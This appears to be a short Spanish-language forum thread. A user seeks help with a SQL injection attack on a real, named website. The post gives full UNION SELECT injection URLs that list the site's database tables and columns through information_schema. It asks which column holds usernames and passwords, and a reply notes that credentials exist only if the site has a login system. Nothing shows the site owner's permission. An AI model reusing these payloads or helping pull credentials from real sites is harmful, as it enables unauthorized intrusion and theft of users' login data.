Ola a todos nunca me habia interesado por el tipo de ataque SQLi pero hacia mucho que no trataba con la informatica y e decidido empezar por ahi esta vez. He llegado a esto:

http://www.feldgrau.com/search.php?ID=1%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6+from+information_schema.tables--

Se que no se suele poner la pagina que de verdad estas atacando pero si no lo pongo no tiene sentido mi pregunta... mi pregunta es: ¿Que columna puede ser la que contenga los datos interesantes (contrasueña/nombre de usuario)?

He revisado varias de ellas y por ejemplo al poner:

.php?ID=1+and+1=0+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=char(KEY_COLUMN_USAGE en ASCII)--

Me muestra que las columnas son KEY_COLUMN_USAGE repetidas veces y al pedir que me de el contenido de las columnas no pone nada...

No se si he usado la terminologia correcta, seguramente no pero espero que hayan entendido mi duda y alguien me pueda ayudar.

Perdon de nuevo por poner la url real pero esto es meramente didactico y espero no encontrarme la pagina defaceada!

Un saludo Søra

Y eso que quiere decir? que no hay registro en la pagina?

Si la pagina tiene un sistema de logueo dinámico encontraras usuario y pass. Si no tiene entonce no encontraras nada sobre eso.